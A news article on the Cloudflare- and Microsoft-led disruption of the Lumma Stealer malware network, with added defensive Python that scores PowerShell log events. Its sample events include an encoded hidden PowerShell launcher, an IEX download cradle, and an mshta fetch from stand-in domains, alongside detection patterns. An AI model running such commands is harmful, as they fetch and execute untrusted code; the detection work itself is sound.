26-05-2025
Cloudflare Helps Disrupt Lumma Stealer Malware Network
Cloudflare has announced its participation in a coordinated effort to disrupt the Lumma Stealer malware operation.
The company's Cloudforce One and Trust and Safety teams worked alongside Microsoft and other partners to target Lumma Stealer, also known as LummaC2. This malware is part of a growing category of information-stealing tools posing serious risks to individuals and organizations.
Lumma Stealer exfiltrates credentials, cryptocurrency wallets, cookies, and other sensitive data from infected systems. The stolen data often fuels downstream criminal activities, including financial fraud, identity theft, and ransomware attacks.
Reportedly, the malware abused multiple infrastructure providers, including Cloudflare. In response, Cloudflare identified the abuse and joined a Microsoft-led takedown operation.
This disruption involved several private partners, including those impacted and those offering intelligence support. It also included cooperation from the U.S. Department of Justice, Europol's European Cybercrime Center (EC3), and Japan's Cybercrime Control Center (JC3).
According to Cloudflare, the operation denied Lumma Stealer operators access to:
- their command-and-control panel and the marketplace for stolen data
- the infrastructure used to collect and manage stolen data
This action has increased operational and financial pressure on Lumma operators and their customers, forcing them to rebuild their malware services elsewhere.
Lumma Stealer is a Malware-as-a-Service platform. It allows cybercriminals to rent an admin panel, retrieve stolen data, and generate custom malware builds for global distribution.
The malware spreads mainly through social engineering. Victims are lured into downloading and executing the payload via fake messages or ads.
To mitigate Lumma Stealer, experts recommend a layered defense: the malware evolves quickly and reaches victims through malvertising, phishing, and trojanized software installers, so no single control will catch every variant.
Cloudflare published several key security recommendations for enterprises and users:
- Block users from downloading executables and scripts from untrusted sources
- Use reputable endpoint detection tools and apply application allow-listing
- Disable or restrict PowerShell and unsigned macros
Additionally, users should avoid saving passwords in browsers, clear autofill data, and disable autofill for sensitive information, since browser-stored credentials, cookies, and form data are exactly what the stealer harvests. Regular software updates and DNS filtering are also critical.
Enterprises should monitor for unusual connections, rare domain access, and suspicious script activity. Email and web filtering tools can also block malicious links and drive-by downloads.
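The monitoring advice above is easier to act on with a concrete scoring rule. The script below is an added example, not code from Cloudflare or from the article: it runs over a handful of constructed PowerShell script-block log entries (shaped like Windows Event ID 4104 records) and flags the patterns the recommendations call out, namely encoded or hidden-window PowerShell, download cradles, LOLBin launches such as mshta, and web requests to domains outside an assumed allowlist. All hostnames, domains, command lines, rule weights and the alert threshold are made up for illustration and would need tuning against real telemetry.

```python
"""Score PowerShell script-block events for infostealer-loader tradecraft."""
import base64
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Constructed sample events (not real telemetry), shaped like the fields a SIEM
# would carry for PowerShell script-block logging (Windows Event ID 4104).
SAMPLE_EVENTS = [
    {"host": "ws-017", "image": "powershell.exe",
     "script": "Get-ChildItem -Path C:\\Users\\alice\\Documents -Recurse"},
    {"host": "ws-042", "image": "powershell.exe",
     "script": "powershell -w hidden -nop -ep bypass -enc "
               "SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAA=="},
    {"host": "ws-042", "image": "powershell.exe",
     "script": "IEX (New-Object Net.WebClient).DownloadString('https://cdn-verify.example.net/check.ps1')"},
    {"host": "ws-103", "image": "mshta.exe",
     "script": "mshta https://captcha-update.example.org/verify.hta"},
    {"host": "ws-007", "image": "powershell.exe",
     "script": "Invoke-WebRequest -Uri https://updates.corp.example.com/agent.msi -OutFile C:\\Temp\\agent.msi"},
]

# Assumed allowlist: domains scripts are expected to reach. Anything else counts as "rare".
ALLOWED_DOMAINS = {"corp.example.com", "microsoft.com", "windowsupdate.com"}

# -enc / -EncodedCommand followed by a base64 blob (captured for decoding).
ENCODED_ARG = re.compile(r"-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{20,})", re.I)
URL_HOST = re.compile(r"https?://([A-Za-z0-9.-]+)", re.I)

# (name, weight, pattern). Weights are illustrative, not calibrated.
RULES = [
    ("encoded_command", 3, ENCODED_ARG),
    ("hidden_window", 2, re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)),
    ("policy_bypass", 2, re.compile(r"-e(?:p|xecutionpolicy)\s+bypass", re.I)),
    ("download_cradle", 3, re.compile(r"DownloadString|DownloadFile|Invoke-Expression|\bIEX\b", re.I)),
    ("lolbin_launch", 2, re.compile(r"\b(?:mshta|rundll32|regsvr32|certutil)(?:\.exe)?\b", re.I)),
    ("web_fetch", 1, re.compile(r"Invoke-WebRequest|\biwr\b|Start-BitsTransfer", re.I)),
]
RARE_DOMAIN_WEIGHT = 2
ALERT_THRESHOLD = 3


@dataclass
class Finding:
    host: str
    score: int
    reasons: List[str] = field(default_factory=list)
    decoded: Optional[str] = None  # decoded -enc payload, when present


def is_allowed(hostname: str, allowed=ALLOWED_DOMAINS) -> bool:
    """Suffix match so sub-domains of an allowed domain pass, look-alikes do not."""
    h = hostname.lower().rstrip(".")
    return any(h == d or h.endswith("." + d) for d in allowed)


def decode_encoded_command(text: str) -> Optional[str]:
    """PowerShell -EncodedCommand is base64 over UTF-16LE; decode it for triage."""
    m = ENCODED_ARG.search(text)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_event(event: dict, allowed=ALLOWED_DOMAINS) -> Finding:
    """Apply every rule to the image + script text and add a rare-domain check."""
    text = f"{event['image']} {event['script']}"
    score, reasons = 0, []
    for name, weight, rx in RULES:
        if rx.search(text):
            score += weight
            reasons.append(name)
    rare = sorted({h.lower() for h in URL_HOST.findall(text) if not is_allowed(h, allowed)})
    if rare:
        score += RARE_DOMAIN_WEIGHT
        reasons.append("rare_domain:" + ",".join(rare))
    return Finding(event["host"], score, reasons, decode_encoded_command(text))


def analyze(events, allowed=ALLOWED_DOMAINS, threshold=ALERT_THRESHOLD) -> List[Finding]:
    """Return only the events that cross the alert threshold, in input order."""
    return [f for f in (score_event(e, allowed) for e in events) if f.score >= threshold]


def host_scores(findings: List[Finding]) -> Dict[str, int]:
    """Aggregate per host so a multi-stage loader on one machine stands out."""
    totals: Dict[str, int] = {}
    for f in findings:
        totals[f.host] = totals.get(f.host, 0) + f.score
    return totals


if __name__ == "__main__":
    alerts = analyze(SAMPLE_EVENTS)
    for f in alerts:
        print(f"{f.host}: score={f.score} reasons={f.reasons} decoded={f.decoded!r}")
    print("per-host totals:", host_scores(alerts))
```

Two design points are worth noting. The Invoke-WebRequest to an allowlisted domain scores low on its own, while the same kind of fetch from an unfamiliar domain is elevated, which is the "rare domain access" signal the recommendations describe; and the per-host aggregation matters because a stealer loader typically arrives as a chain (hidden encoded launcher, then a download cradle) spread across several events.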
Finally, user training is vital. Educating users about scareware, fake installers, and PowerShell misuse can help prevent infections and strengthen defenses against Lumma Stealer.